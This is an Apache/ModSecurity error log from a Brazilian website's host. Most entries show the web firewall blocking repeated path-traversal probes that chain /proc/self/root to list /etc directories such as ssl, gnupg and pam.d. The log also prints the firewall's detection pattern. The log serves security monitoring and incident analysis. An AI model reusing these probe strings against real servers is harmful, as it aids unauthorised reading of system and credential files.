[Tue Mar 17 16:26:00.226222 2026] [:error] [pid 2598:tid 140411607643904] [client 74.7.241.31:42802] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqyBj0p0SRWAqcjGGINQAAAxA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:26:03.091416 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.241.31:42814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqyweiSKl8TjouI-YmeQAAA8o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:26:17.129916 2026] [proxy_fcgi:error] [pid 18380:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35118] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:26:18.479566 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.241.31:35984] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmq2qBJNF7axNlVR0UnHgAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:26:18.974241 2026] [core:alert] [pid 7004:tid 140411666392832] [client 74.7.243.128:35968] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/systemd/user/printer.target&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/systemd/user
[Tue Mar 17 16:26:19.763656 2026] [:error] [pid 29151:tid 140411741927168] [client 74.7.243.128:33382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmq2_PqhzTj3BvfDX-WDQAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:26:21.482219 2026] [:error] [pid 2598:tid 140411725141760] [client 74.7.241.31:35992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmq3Rj0p0SRWAqcjGGIQAAAAwI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:26:22.303190 2026] [:error] [pid 18380:tid 140411616036608] [client 74.7.243.128:33394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmq3q4xEDsg_V3ESNZZ4wAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:26:22.900711 2026] [:error] [pid 18380:tid 140411607643904] [client 74.7.241.31:35998] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmq3q4xEDsg_V3ESNZZ5AAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:26:25.298932 2026] [:error] [pid 2598:tid 140411674785536] [client 74.7.241.31:36010] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmq4Rj0p0SRWAqcjGGIRgAAAwg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:26:37.540987 2026] [:error] [pid 2473:tid 140411691570944] [client 74.7.241.31:34514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmq7aBJNF7axNlVR0UnIgAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:26:39.133830 2026] [proxy_fcgi:error] [pid 18380:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35456] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:26:39.858926 2026] [:error] [pid 6296:tid 140411725141760] [client 74.7.241.31:34518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmq73Ik7brgkOH-rIWaZAAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:26:42.253398 2026] [:error] [pid 6296:tid 140411708356352] [client 74.7.241.31:34534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmq8nIk7brgkOH-rIWaZQAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:26:46.656376 2026] [:error] [pid 6296:tid 140411674785536] [client 74.7.241.31:34538] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmq9nIk7brgkOH-rIWaagAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:26:49.227351 2026] [:error] [pid 6296:tid 140411691570944] [client 74.7.241.31:40098] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmq-XIk7brgkOH-rIWaawAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:27:00.129786 2026] [proxy_fcgi:error] [pid 2598:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:35784] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:27:02.346187 2026] [:error] [pid 25836:tid 140411540502272] [client 74.7.241.31:33808] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrBoh-PF_25v4hFRB5pQAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:27:04.778856 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:33818] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrCNa6ubjKNq_cu4YW7gAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:27:06.997955 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.241.31:33834] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrCgeiSKl8TjouI-YmiwAAA9g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:27:22.134416 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36146] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:27:25.012515 2026] [:error] [pid 7437:tid 140411699963648] [client 74.7.241.31:34790] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrHQeiSKl8TjouI-YmkgAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:27:43.045868 2026] [proxy_fcgi:error] [pid 18380:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36510] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:27:46.542084 2026] [:error] [pid 6296:tid 140411716749056] [client 74.7.241.31:41262] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrMnIk7brgkOH-rIWaiQAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:27:48.351427 2026] [:error] [pid 25836:tid 140411616036608] [client 74.7.241.31:56216] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrNIh-PF_25v4hFRB5rgAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:27:51.815751 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:56230] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrN9a6ubjKNq_cu4YW-AAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
